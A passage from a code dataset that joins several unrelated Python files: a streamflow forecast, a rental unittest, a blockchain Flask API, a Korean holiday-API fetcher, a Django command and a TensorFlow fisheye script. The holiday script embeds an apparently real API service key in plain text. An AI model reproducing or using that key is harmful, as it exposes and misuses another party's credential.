pd.DatetimeIndex(data['datetime']).dayofweek\ndata['dayofweek'] = pd.DatetimeIndex(data['datetime']).dayofweek\n\n# %%\n# Aggregate flow values to weekly\nflow_weekly = data.resample(\"W\", on='datetime').mean()\n# %%\n# Setting up the arrays for my model I will use\n# This is an autoregressive model that uses two time lags\nflow_weekly['flow_tm1'] = flow_weekly['flow'].shift(1)\nflow_weekly['flow_tm2'] = flow_weekly['flow'].shift(2)\n\n# %%\n# Variables that change weekly\nlast_week_flow = 80.157\nlast2_week_flow = 73.657\n# %%\n# Here I'm grabbing weeks from 1996-2000 as training dates\n# For the test it runs from 2000 to most current time in data\n\n# LC - You could think about having these date ranges be variable you\n# define at the top\ntrain = flow_weekly[370:600][['flow', 'flow_tm1', 'flow_tm2']]\ntest = flow_weekly[600:][['flow', 'flow_tm1', 'flow_tm2']]\n\n\n# %%\n# Making a linear regression with Sklearn\nmodel = LinearRegression()\nx = train['flow_tm1'].values.reshape(-1, 1)\ny = train['flow'].values\nmodel.fit(x, y)\n# Look at the results including r_squared value, intercept, slope\n# r^2 values\nr_sq = model.score(x, y)\nprint('coefficient of determination:', np.round(r_sq, 2))\nprint('intercept:', np.round(model.intercept_, 2))\nprint('slope:', np.round(model.coef_, 2))\n\n\n# %%\n# Looking at one week time lag to make prediciton\n# Looking at prediction based on previous week\nprediction = model.intercept_ + model.coef_ * last_week_flow\nprint(\"prediciton based on previous week=\", prediction)\n\n\n# %%\n# 
# %%\n# Adding another week to the model (week 1, week 2 time lag)\n# Using two time lags in the linear regression\nmodel2 = LinearRegression()\nx2 = train[['flow_tm1', 'flow_tm2']]\nmodel2.fit(x2, y)\nr_sq = model2.score(x2, y)\nprint('coefficient of determination:', np.round(r_sq, 2))\nprint('intercept:', np.round(model2.intercept_, 2))\nprint('slope:', np.round(model2.coef_, 2))\n# %%\n# Using the two prior weeks to make a prediction for 9/27-10/3\nprediction2 = (model2.intercept_ + model2.coef_[0] * last_week_flow\n               + model2.coef_[1] * last2_week_flow)\nprint(\"prediction based on previous 2 weeks=\", prediction2)\n\n\n# %%\n# Making my predictions outside of the AR model\n# This utilizes a correction factor calculated by looking at the AR model value\n# and comparing it to the previous weeks' observed flow\n\nmy_prediction_1 = real_prediction(0, last_week_flow, None)*0.80\nmy_prediction_2 = real_prediction(1, last_week_flow, last2_week_flow)*0.84\nprint(\"week 1 prediction outside AR=\", my_prediction_1.round(1))\nprint(\"week 2 prediction outside AR=\", my_prediction_2.round(1))\n\n\n# %%\n# The four numbers show my AR model and my corrected forecast values\n# for the week 1 and week 2 predictions\nprint(\"AR prediction based on previous 1 week=\", prediction.round(1))\nprint(\"AR prediction based on previous 2 weeks=\", prediction2.round(1))\nprint(\"This is my week 1 prediction outside the AR model=\",\n      my_prediction_1.round(1))\nprint(\"This is my week 2 prediction outside the AR model=\",\n      my_prediction_2.round(1))\n\n\n\n# %%\n# Redefining the data so I can index by datetime\n# easily and pull out the times I want\ndata2 = data.copy()\ndata2['datetime'] = pd.to_datetime(data2['datetime'])\ndata2 = data2.set_index('datetime')\n\n\n# %%\n# Making a new data set to look at weekly minimum flows for the 16 week forecast\ndata_w = data2.resample(\"w\").min()\n\n\n# %%\n# Pulling out the weekly data I will use for the 16 week forecast\ndata_w.loc[\"2019-8-15\":\"2019-12-15\"]\n\n# %%\n# Here I have put the weekly data from the previous cell into an array\n# I then averaged each week with the preceding week\nweekly_2019_mins = np.array([48.1, 29.6, 35.7, 59, 48.6, 51.2, 60.9, 72.7,\n                             80.7, 73.9, 81.2, 97.1, 124, 130, 147, 180, 445])\n\nforecast_16_week = ((weekly_2019_mins +\n                     np.roll(weekly_2019_mins, 1))/2.0)[1:]\nprint(\"These will serve as my 16 week forecast values\", forecast_16_week)\n\n\n# %%\n","sub_path":"assignment_11-Group_Project/Stratman_week10.py","file_name":"Stratman_week10.py","file_ext":"py","file_size_in_byte":6742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"477384432","text":"import unittest\r\n\r\nfrom Customer import Customer\r\nfrom Rental import Rental\r\nfrom Movie import Movie\r\n\r\nREGULAR = 0\r\nCHILDRENS = 2\r\nNEW_RELEASE = 1\r\n\r\nclass TestCustomer(unittest.TestCase):\r\n    \r\n    pedro = Customer(\"Петр\")\r\n    \r\n    robocop = Movie(\"Робокоп\", price_code=REGULAR)\r\n    one_day_rent = Rental(robocop, days_rented=1)\r\n    great_then_two_days_rent = Rental(robocop, days_rented=3)\r\n\r\n    batman = Movie(\"Бэтмен против Супермена\", price_code=NEW_RELEASE)\r\n    one_day_new_rel_rent = Rental(batman, days_rented=1)\r\n    greater_then_one_day_new_release_rent = Rental(batman, days_rented=2)\r\n\r\n    kinglion = Movie(\"Король Лев\", price_code=CHILDRENS)\r\n    one_day_child_rent = Rental(kinglion, days_rented=1)\r\n    greater_then_three_days_child_rent = Rental(kinglion, days_rented=4)\r\n\r\n    def setUp(self):\r\n        self.pedro.rentals = []\r\n\r\n    
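# Pricing rules these tests encode (the classic video-rental refactoring example):\r\n    # REGULAR: 2.0 for up to two days, then 1.5 per extra day; NEW_RELEASE: 3.0 per\r\n    # day, with a second frequent-renter point for rentals longer than one day;\r\n    # CHILDRENS: 1.5 for up to three days, then 1.5 per extra day.\r\n\r\n    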
def test_one_day_one_regular(self):\r\n self.pedro.add_rental(self.one_day_rent)\r\n statement = self.statement(\r\n movie=self.one_day_rent.get_movie(), \r\n this_amount = 2, \r\n total_amount = 2, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_great_then_two_days_regular(self):\r\n self.pedro.add_rental(self.great_then_two_days_rent)\r\n statement = self.statement(\r\n movie=self.great_then_two_days_rent.get_movie(), \r\n this_amount = 3.5, \r\n total_amount = 3.5, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_one_day_new_release(self):\r\n self.pedro.add_rental(self.one_day_new_rel_rent)\r\n statement = self.statement(\r\n movie=self.one_day_new_rel_rent.get_movie(), \r\n this_amount = 3, \r\n total_amount = 3, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_greater_then_one_day_new_release(self):\r\n self.pedro.add_rental(self.greater_then_one_day_new_release_rent)\r\n statement = self.statement(\r\n movie=self.greater_then_one_day_new_release_rent.get_movie(), \r\n this_amount = 6, \r\n total_amount = 6, \r\n frequent_renter_points = 2)\r\n self.assertEqual(statement, self.pedro.statement())\r\n\r\n def test_one_day_child_rent(self):\r\n self.pedro.add_rental(self.one_day_child_rent)\r\n statement = self.statement(\r\n movie=self.one_day_child_rent.get_movie(), \r\n this_amount = 1.5, \r\n total_amount = 1.5, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement()) \r\n\r\n def test_greater_then_three_days_child_rent(self):\r\n self.pedro.add_rental(self.greater_then_three_days_child_rent)\r\n statement = self.statement(\r\n movie=self.greater_then_three_days_child_rent.get_movie(), \r\n this_amount = 3.0, \r\n total_amount = 3.0, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement()) \r\n\r\n def statement(self, movie, this_amount, total_amount, frequent_renter_points):\r\n result = \"Учет аренды для \" + self.pedro.get_name() + \"\\n\" \\\r\n + \"\\t\" + movie.get_title() + \"\\t\" + str(this_amount) + \"\\n\" \\\r\n + \"Сумма задолженности составляет \" + str(total_amount) + \"\\n\" \\\r\n + \"Вы заработали \" + str(frequent_renter_points) + \" очков за активность\"\r\n return result\r\n\r\n\r\nif __name__ == \"__main__\": unittest.main()","sub_path":"rental/step_1/TestCustomer.py","file_name":"TestCustomer.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149223303","text":"#Data processing - converting the raw csv into an array\n#this uses the github dataset\n\nimport csv, random\nimport matplotlib.pyplot as plt\n\nvals = []\nmaxvals = []\n\n\ndef importData():\n size = 1368\n #1367 is the label\n #numerical data ends at 1366\n #not bringing in booleans rn\n global vals\n with open('data.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n curr = [0 for i in range (size)]\n for col in range (size):\n curr[col] = row[col]\n vals.append(curr)\n #this is important for formatting\n vals[0][0] = vals[0][0][3:]\n #have to get in floats cause really small numbers break it\n for i in range(0, len(vals)):\n for j in range(0, len(vals[0])-1):\n if float(vals[i][j])< 0.01:\n vals[i][j] = float(vals[i][j])\n #process\n for i in range (len(vals)):\n temp = vals[i][1367]\n valid = temp.find('Normal')\n #if normal is not 
found, set the label to -1: it has a tumour\n        if valid == -1:\n            vals[i][1367] = -1\n        #if normal is found, set the label to 1: it doesn't have a tumour\n        else:\n            vals[i][1367] = 1\n    #scramble so the same stuff isn't all together\n    #random.shuffle(vals)\n    for i in range(len(vals)):\n        maxvals.append(max(vals[i]))\n    \n    tsum = 0\n    for i in range(0,237):\n        tsum += float(maxvals[i])\n    print(float(tsum/237), ' - cancer') #slightly higher - 0.732\n    tsum = 0 \n    for i in range(237, len(maxvals)):\n        tsum += float(maxvals[i])\n    print(float(tsum/88),' - non') #slightly lower - 0.726\n\n\n\ndef printData():\n    global vals\n    #printing labels\n    for i in range(len(vals)):\n        print (maxvals[i], ' - ' , vals[i][1367])\n\ndef draw():\n    #this plots the data; big spike around 1k\n    global vals\n    temparray = []\n    for j in range(235,236): \n        for i in range(0,1366):\n            temparray.append(float(vals[j][i]))\n    plt.plot(temparray)\n    \n    plt.show()\n\n#mainline\nprint ('run')\nimportData()\ndraw()\nprint ('done')","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"447214122","text":"'''Write a program that reads a student's two grades and computes the average.\r\nAverage below 5: failed\r\naverage between 5 and 6.9: make-up exam\r\naverage of 7 or more: passed.'''\r\n# inputs:\r\nn1 = float(input('Enter the first grade: '))\r\nn2 = float(input('Enter the second grade: '))\r\n\r\n# calculation:\r\nmedia = (n1 + n2) / 2\r\n\r\n# program:\r\nif media < 5:\r\n    print(\"The student's average is {:.2f}, so the student FAILED!\".format(media))\r\nelif media < 7:\r\n    print(\"The student's average is {:.2f}, so the student must take a MAKE-UP EXAM!\".format(media))\r\nelse:\r\n    print(\"The student's average is {:.2f}, so the student PASSED!\".format(media))\r\n","sub_path":"Desafio40.py","file_name":"Desafio40.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"8671485","text":"import requests\nfrom flask import Flask, jsonify, request, render_template\n#from flask_cors import CORS\nimport sys\nimport json\n\nimport node\nimport wallet\nimport transaction\n\n\n### JUST A BASIC EXAMPLE OF A REST API WITH FLASK\n\n\n\napp = Flask(__name__)\n#CORS(app)\n# the user should provide the rest api's ports\nif(len(sys.argv)==1):\n    print(\"Usage is python3 rest.py is_it_bootstrap? how_many_children? myPort ip_bootstrap myIP !\")\n    sys.exit(0)\n\nif len(sys.argv) != 6:\n    print(\"Usage is python3 rest.py is_it_bootstrap? how_many_children? myPort ip_bootstrap myIP !\")\n    sys.exit(0)\n\n# arguments, in order: is_bootstrap? | number_of_children | my_port | bootstrap_ip | my_ip\n
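# example invocation (values are illustrative, not from the original source):\n#   python3 rest.py 1 4 5000 192.168.1.10 192.168.1.10\n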
start = node.node(sys.argv[1], int(sys.argv[2]),sys.argv[3], sys.argv[4], sys.argv[5])\n\n#.......................................................................................\n\n@app.route('/show_balance', methods=['GET'])\ndef get_bal():\n    bal = start.wallet.mybalance()\n    response = {\n        'Balance': bal\n    }\n    return jsonify(response), 200\n\n@app.route('/view_transactions', methods=['GET'])\ndef get_trans():\n\n    last_transactions = start.chain.list[-1].listOfTransactions\n    # something here is wrong (the same list is returned under two keys)\n    response = {\n        'reply': last_transactions,\n        'List of transactions in the last verified block': last_transactions\n    }\n    return jsonify(response), 200\n\n@app.route('/create_transaction', methods=['POST'])\ndef create():\n    data = request.get_json()\n    addr = data['addr']\n    #print (\"Address is\",addr)\n    amount = data['amount']\n    #print(\"Amount is\",amount)\n    #current balance\n    bal = start.wallet.mybalance()\n    if (not addr.isnumeric() or int(addr) < 0 or int(addr) > start.nei):\n        response = {\n            'message': \"Please provide a number between 0 and \" + str(start.nei) + \" as address.\"\n        }\n    elif (int(addr) == start.id):\n        response = {\n            'message': \"You cannot make a transaction with yourself...\"\n        }\n    elif (not amount.isnumeric() or int(amount) <= 0):\n        response = {\n            'message': \"Please provide a positive number as amount.\"\n        }\n    elif int(amount) > bal:\n        response = {\n            #'message': \"The kid is a little broke...\",\n            'CLICK HERE': \"https://www.youtube.com/watch?v=TeT0vNbjs5w\"\n        }\n    else:\n        # stall the transaction till mining is done\n        if not node.no_mine.isSet():\n            node.no_mine.wait()\n\n        sender = start.public_key_list[start.id]\n        receiver = start.public_key_list[int(addr)]\n        start.create_transaction(sender,receiver,int(amount))\n\n        response = {\n            'message': \"Create transaction works !\"\n        }\n    return jsonify(response), 200\n\n@app.route('/nodes/mined_block', methods = ['POST'])\ndef node_found():\n    values = request.get_json()\n    last_block = values['last_block'] # this may be parsed incorrectly\n    print(\"Last block of miner\", last_block)\n    if start.verify_and_add_block(last_block):\n        node.no_mine.set()\n        response = {\n            'message' : 'BLOCK ADDED TO BLOCKCHAIN'\n        }\n        return jsonify(response), 201\n    else:\n        response = {\n            'message' : 'BLOCK VERIFICATION FAILED'\n        }\n        return jsonify(response), 400\n\n\n\n@app.route('/nodes/register', methods = ['POST'])\ndef register():\n\n    \"\"\"\n    myid = request.form['id']\n    ring = request.form.getlist('ring')\n    keys = request.form.getlist('public_key_list')\n    gen_index = request.form['gen_index']\n    gen_timestamp = request.form['gen_timestamp']\n    gen_transactions = request.form.getlist('gen_transactions')\n    gen_nonce = request.form['gen_nonce']\n    gen_previousHash = request.form['gen_previous_hash']\n    \"\"\"\n    data = request.get_json()\n    myid = data['id']\n    ring = data['ring']\n    keys = data['public_key_list']\n    genesis = data['genesis']\n\n    #print(\"genesis\", genesis)\n    #print(\"myid\",myid)\n    #print(\"gen_timestamp\",gen_timestamp)\n    #print(\"gen_transactions\",gen_transactions)\n    #print(\"gen_nonce\",gen_nonce)\n    #print(\"gen_previousHash\",gen_previousHash)\n    if myid is None:\n        return \"Error:No valid myid\",400\n    if ring is None:\n        return \"Error:No valid ring\",400\n    if keys is None:\n        return \"Error:No valid public keys\",400\n    start.recieve(myid, ring,keys,genesis)\n    response = {'message': 'ok'}\n    return jsonify(response), 200\n\n
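# Editor's usage sketch (host and port are assumptions, not from the original):\n#   requests.get('http://127.0.0.1:5000/show_balance')\n#   requests.post('http://127.0.0.1:5000/create_transaction', json={'addr': '1', 'amount': '10'})\n# addr and amount are sent as strings because the handler validates them with str.isnumeric().\n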
@app.route('/nodes/reg_dad', methods = ['POST'])\ndef reg():\n\n    a = request.form['address']\n    mykey = request.form['public_key']\n    if a is None:\n        return \"Error:No valid address\",400\n    #print(a)\n    #print(mykey)\n    start.reg_a_node(a,mykey)\n    response = {'message': 'ok'}\n    return jsonify(response), 200\n\n@app.route('/transactions/new', methods = ['POST'])\ndef new_tran():\n    \"\"\"\n    sender = request.form['sender_adress']\n    receiver = request.form['receiver']\n    value = request.form['value']\n    myid = request.form['myid']\n    in_list = request.form.getlist('inputs')\n    out_list = request.form['outputs']\n    sign = request.form['sign']\n    \"\"\"\n    data = request.get_json()\n    sender = data['sender']\n    receiver = data['receiver']\n    value = data['value']\n    myid = data['myid']\n    in_list = data['inputs']\n    out_list = data['outputs']\n    sign = data['sign']\n\n    # NOT SURE IF NEEDED\n    if not node.no_mine.isSet():\n        node.no_mine.wait()\n\n    start.receive_trans(sender,receiver,value,myid,in_list,out_list,sign)\n\n    print(\"BALANCE\",start.wallet.mybalance())\n    response = {'message': 'ok'}\n    return jsonify(response), 200\n\nif __name__ == '__main__':\n    app.run(host=sys.argv[5], port = int(sys.argv[3]))\n","sub_path":"src/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"360391811","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 17:54:38 2020\n\n@author: keti\n\"\"\"\n\n\nimport requests\nimport pandas as pd\n\ndef get_request_query(url, operation, params, serviceKey):\n    import urllib.parse as urlparse\n    params = urlparse.urlencode(params)\n    request_query = url + '/' + operation + '?' + params + '&' + 'serviceKey' + '=' + serviceKey+'&_type=json'\n    return request_query\n\n# request URL and operation\nURL = 'http://apis.data.go.kr/B090041/openapi/service/SpcdeInfoService'\nOPERATION = 'getRestDeInfo' # operation that looks up national and public holiday info\nSERVICEKEY = 'f0zYRYA98oJ0kjZpHkrHyzOMbBXmY7Iwev8c8n35kw%2FFlpgBHtsVTb6aD%2BKIPUgo3g2BAUisHDuSDNF7wLaZ%2Bg%3D%3D'# parameters\nPARAMS = {'solYear':'2017', 'solMonth':'01'}\n\nholiday=pd.DataFrame(columns=['dateKind', 'dateName', 'isHoliday', 'locdate', 'seq'])\n\nfor year in range(2017,2021):\n    print(year)\n    for month in range(1,13):\n        if month<10:\n            PARAMS = {'solYear':str(year), 'solMonth': '0'+str(month)}\n            print(PARAMS)\n        else:\n            PARAMS = {'solYear':str(year), 'solMonth': str(month)}\n            print(PARAMS)\n        request_query = get_request_query(URL, OPERATION, PARAMS, SERVICEKEY)\n        html= requests.get(request_query)\n        dictr=html.json().get('response').get('body').get('items')\n\n        if dictr != '':\n            recs = dictr['item']\n            # json_normalize moved to the pandas top level in pandas 1.0\n            df = pd.json_normalize(recs)\n            holiday=pd.concat([holiday, df], axis=0)\n\ndel(year, month, dictr, recs, df, request_query)\n\nholiday=holiday.assign(date= pd.to_datetime(holiday['locdate'].astype(str)).dt.date).drop(['dateKind', 'isHoliday','locdate','seq' ], axis=1)\n\n","sub_path":"Timeseries/Hands6/holiday_api.py","file_name":"holiday_api.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
 +{"seq_id":"325954941","text":"# PROJECT : kungfucms\n# TIME : 2019/7/21 10:16\n# AUTHOR : Younger Shen\n# EMAIL : younger.x.shen@gmail.com\n# CELL : 13811754531\n# WECHAT : 13811754531\n# https://github.com/youngershen/\n\nimport os\nimport shutil\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.utils.translation import ugettext as _\nfrom django.core import management\nfrom django.core.management.commands import startapp\n\n\nclass Command(BaseCommand):\n    template_path = os.path.join(settings.BASE_DIR, 'kungfucms', 'utils', 'conf', 'app_template')\n    default_path = os.path.join(settings.BASE_DIR, 'kungfucms', 'apps')\n    help = _('Create an app')\n\n    def add_arguments(self, parser):\n        parser.add_argument('name',\n                            help=_('Name of the app'))\n\n        parser.add_argument('-p',\n                            '--path',\n                            nargs='?',\n                            const=self.default_path,\n                            default=self.default_path,\n                            help=_('Path of the app'))\n\n        parser.add_argument('-f',\n                            '--force',\n                            action='store_true',\n                            help=_('Overwrite an existing app with the same name'))\n\n    def handle(self, *args, **options):\n        name = options['name']\n        path = os.path.join(options['path'], name)\n\n        if not os.path.exists(path):\n            os.mkdir(path)\n            self.create_app(name, path)\n\n        elif options['force']:\n            shutil.rmtree(path)\n            os.mkdir(path)\n            self.create_app(name, path)\n\n        else:\n            raise CommandError(_('The app {APP_NAME} already exists').format(APP_NAME=name))\n\n    def create_app(self, name, path):\n        management.call_command(startapp.Command(),\n                                name,\n                                path,\n                                '--template={PATH}'.format(PATH=self.template_path))","sub_path":"kungfucms/apps/core/management/commands/newapp.py","file_name":"newapp.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196107308","text":"import tensorflow as tf\nimport numpy as np\n\ndef calc_shift(x1, x2, cx, k):\n    \n    x1 = tf.cast(x1, dtype = tf.float32)\n    x2 = tf.cast(x2, dtype = tf.float32)\n    x3 = tf.cast(0, dtype = tf.float32)\n    \n    cx = tf.cast(cx, dtype = tf.float32)\n    k = tf.cast(k, dtype = tf.float32)\n    res1 = tf.cast(0, dtype = tf.float32)\n    res3 = tf.cast(0, dtype = tf.float32)\n    \n    def calc(x1, x2, x3, cx, k, res1, res3):\n        x1, x2 = tf.cond( res3 < 0, lambda : (x3, x2), lambda : (x1, x3) )\n\n        x3 = x1 + (x2 - x1) * 0.5\n        res1 = x1 + ((x1 - cx) * k * ((x1 - cx) * (x1 - cx)))\n        res3 = x3 + ((x3 - cx) * k * ((x3 - cx) * (x3 - cx)))\n\n        return x1, x2, x3, cx, k, res1, res3\n\n    def check(x1, x2, x3, cx, k, res1, res3):\n        thresh = 1.0\n        conv = tf.logical_and( tf.greater(-thresh, res1), tf.less(res1, thresh) )\n        return conv\n\n    x1, x2, x3, cx, k, res1, res3 = tf.while_loop(check, calc, loop_vars = [x1, x2, x3, cx, k, res1, res3])\n\n    return x1\n\n\ndef getRadialXY(x, y, cx, cy, k, k1, k2, sc, props):\n\n    def scale(x, y, cx, cy, k, k1, k2, sc, props):\n        xshift = props[0]\n        yshift = props[1]\n        xscale = props[2]\n        yscale = props[3]\n\n        x = tf.cast(x, dtype = tf.float32)\n        x = x * xscale + xshift\n        y = tf.cast(y, dtype = tf.float32)\n        y = y * yscale + yshift\n        r = tf.pow((x - cx), 2) + tf.pow((y - cy), 2)\n        y = (y + k * ((y - cy) * r) + k1 * ((y - cy) * tf.pow(r, 2)) + k2 * ((y - cy) * tf.pow(r, 3)))\n        x = (x + k * ((x - cx) * r) + k1 * ((x - cx) * tf.pow(r, 2)) + k2 * ((x - cx) * tf.pow(r, 3)))\n        return y, x\n\n    def not_scale(x, y, cx, cy, k, k1, k2, sc, props):\n        x = tf.cast(x, dtype = tf.float32)\n        y = tf.cast(y, dtype = tf.float32)\n        r = tf.pow((x - cx), 2.0) + tf.pow((y - cy), 2.0)\n        y = (y + k * ((y - cy) * r) + k1 * ((y - cy) * tf.pow(r, 2)) + k2 * ((y - cy) * tf.pow(r, 3)))\n        x = (x + k * ((x - cx) * r) + k1 * ((x - cx) * tf.pow(r, 2)) + k2 * ((x - cx) * tf.pow(r, 3)))\n        return y, x\n\n    y, x = tf.cond(sc, lambda : scale(x, y, cx, cy, k, k1, k2, sc, props), lambda : not_scale(x, y, cx, cy, k, k1, k2, sc, props))\n    return y, x\n\n\ndef fisheye(img, Cx, Cy, k, k1, k2, scale):\n\n    Cx = tf.Print(Cx, [Cx, 'Cx'])\n    scale = 
tf.constant(scale, dtype = tf.bool)\n scale = tf.Print(scale, [scale, 'scale'])\n\n shape = tf.shape(img)\n shape = tf.Print(shape, [shape, 'shape'])\n\n xshift = calc_shift(0, Cx - 1, Cx, k)\n xshift = tf.Print(xshift, [xshift, 'xshift'])\n\n w = tf.cast(shape[0], dtype = tf.float32)\n h = tf.cast(shape[1], dtype = tf.float32)\n w = tf.Print(w, [w, 'w'])\n h = tf.Print(h, [h, 'h'])\n \n newcenterx = w - Cx\n newcenterx = tf.Print(newcenterx, [newcenterx, 'newcenterx'])\n\n xshift2 = calc_shift(0, newcenterx - 1, newcenterx, k)\n xshift2 = tf.Print(xshift2, [xshift2, 'xshift2'])\n yshift = calc_shift(0, Cy - 1, Cy, k)\n yshift = tf.Print(yshift, [yshift, 'yshift'])\n newcentery = w - Cy\n newcentery = tf.Print(newcentery, [newcentery, 'newcentery'])\n yshift2 = calc_shift(0, newcentery - 1, newcentery, k)\n yshift2 = tf.Print(yshift2, [yshift2, 'yshift2'])\n xscale = (w - xshift - xshift2) / w\n yscale = (h - yshift - yshift2) / h\n xscale = tf.Print(xscale, [xscale, 'xscale'])\n yscale = tf.Print(yscale, [yscale, 'yscale'])\n\n props = tf.stack([xshift, yshift, xscale, yscale])\n props = tf.Print(props, [props, 'props'])\n\n y = tf.constant(1, dtype = tf.int32)\n x = tf.constant(1, dtype = tf.int32)\n\n new_y, new_x = getRadialXY(0, 0, Cx, Cy, k, k1, k2, scale, props)\n map_xy = tf.stack([new_y, new_x])\n map_xy = tf.reshape(map_xy, shape = (1, 2))\n\n def create_map(x, y, map_xy, Cx = Cx, Cy = Cy, k = k, k1 = k1, k2 = k2, scale = scale, props = props, h = tf.cast(h, dtype = tf.int32)):\n new_y, new_x = getRadialXY(x, y, Cx, Cy, k, k1, k2, scale, props)\n map_xy = tf.concat([map_xy, [[new_y, new_x]]], axis = 0)\n\n y = y + 1\n x = tf.cond(tf.greater_equal(y, h), lambda : tf.add(x, 1), lambda : x)\n y = tf.cond(tf.greater_equal(y, h), lambda : tf.constant(0), lambda : y)\n x = tf.Print(x, [x, 'loop_x'])\n y = tf.Print(y, [y, 'loop_y'])\n\n return x, y, map_xy\n \n def check(x, y, map_xy):\n cond = tf.logical_and(tf.less(tf.cast(y, dtype = tf.float32), h), tf.less(tf.cast(x, dtype = tf.float32), w))\n return cond\n\n x, y, map_xy = tf.while_loop(cond = check, body = create_map, loop_vars = [x, y, map_xy], \\\n shape_invariants = [x.get_shape(), y.get_shape(), tf.TensorShape([None, None])], parallel_iterations = 1000,\n back_prop = False, swap_memory = False)\n\n print(map_xy)\n return map_xy\n\ndef get_fisheyed(img, focal_len = 800):\n \n with tf.device('/cpu:0'):\n # parametrs\n f = tf.constant(focal_len, dtype = tf.float32) # focal'ish\n # magic constants\n f = tf.Print(f, [f, 'f'])\n k = 0.5 * tf.pow(10.0, -2.0) / f\n k1 = k * tf.pow(10.0, -9.0)\n k2 = k1\n k = tf.Print(k, [k, 'k'])\n\n sz = tf.shape(img)\n sz = tf.Print(sz, [sz, 'image shape'])\n Cx = tf.cast(tf.divide(sz[0], 2), dtype = tf.float32)\n Cx = tf.Print(Cx, [Cx, 'Cx'])\n Cy = tf.cast(tf.divide(sz[1], 2), dtype = tf.float32)\n Cy = tf.Print(Cy, [Cy, 'Cy'])\n\n fisheyed = fisheye(img, Cx, Cy, k, k1, k2, True)\n\n return fisheyed\n\n\nif __name__ == '__main__':\n\n # test zoom\n filenames = ['/home/undead/Pictures/MVI_2780 11.jpg']\n filename_queue = tf.train.string_input_producer(filenames)\n\n reader = tf.WholeFileReader()\n key, value = reader.read(filename_queue)\n\n images = tf.image.decode_jpeg(value, channels = 3)\n\n init_op = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init_op)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n print('inited')\n #print('images:', sess.run(images).shape)\n mapxy = get_fisheyed(images)\n 
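# NOTE (editor's comment, not in the original): map_xy is built one pixel at a time by\n        # tf.concat inside tf.while_loop, so evaluating it is likely to be very slow on large images.\n        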
print(sess.run(mapxy))","sub_path":"generate_zooms.py","file_name":"generate_zooms.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"552254790","text":"from jsonutil import json_load_byteified as json_loads_file\n\ndef sumnested(target, source):\n\t# merge `source` into a copy of `target`: scalar leaves are summed,\n\t# nested dicts are merged recursively\n\tn = dict(target)\n\tfor k in source:\n\t\tvalue = 0\n\t\tif isinstance(source[k], dict):\n\t\t\tvalue = sumnested(n.get(k, dict()), source[k])\n\t\t\n\t\telse:\n\t\t\tvalue = source[k] + n.get(k, 0)\n\n\t\tn[k] = value\n\n\treturn n\n\ndef compile_software(data):\n\t## Sort the data based on software\n\tdata = sorted(data, key=lambda x: x[1])\n\tcompiledata = dict()\n\t\n\tfor hour, software, device, fpath in data:\n\t\tif software not in compiledata:\n\t\t\tcompiledata[software] = {\n\t\t\t\t\"mintime\": None,\n\t\t\t\t\"maxtime\": None,\n\t\t\t\t\"unique_devices\": set(),\n\t\t\t\t\"data\": dict()\n\t\t\t}\n\n\n\t\t# check for None first so the comparison is never made against None\n\t\tif compiledata[software][\"mintime\"] is None or hour < compiledata[software][\"mintime\"]:\n\t\t\tcompiledata[software][\"mintime\"] = hour\n\n\t\tif compiledata[software][\"maxtime\"] is None or hour > compiledata[software][\"maxtime\"]:\n\t\t\tcompiledata[software][\"maxtime\"] = hour\n\n\t\tcompiledata[software][\"unique_devices\"].add(device)\n\n\t\twith open(fpath, \"r\") as infile:\n\t\t\tprops = json_loads_file(infile)\n\t\t\tcompiledata[software][\"data\"] = sumnested(compiledata[software][\"data\"], props)\n\n\treturn compiledata\n\ndef compile_device(data):\n\tdata = sorted(data, key=lambda x: x[2])\n\tcompiledata = dict()\n\n\tfor hour, software, device, fpath in data:\n\t\tif device not in compiledata:\n\t\t\tcompiledata[device] = {\n\t\t\t\t\"mintime\": None,\n\t\t\t\t\"maxtime\": None,\n\t\t\t\t\"unique_softwares\": set(),\n\t\t\t\t\"data\": dict()\n\t\t\t}\n\n\t\tif compiledata[device][\"mintime\"] is None or hour < compiledata[device][\"mintime\"]:\n\t\t\tcompiledata[device][\"mintime\"] = hour\n\n\t\tif compiledata[device][\"maxtime\"] is None or hour > compiledata[device][\"maxtime\"]:\n\t\t\tcompiledata[device][\"maxtime\"] = hour\n\n\t\tcompiledata[device][\"unique_softwares\"].add(software)\n\n\t\twith open(fpath, \"r\") as infile:\n\t\t\tprops = json_loads_file(infile)\n\t\t\tcompiledata[device][\"data\"] = sumnested(compiledata[device][\"data\"], props)\n\n\treturn compiledata","sub_path":"data_compiler.py","file_name":"data_compiler.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 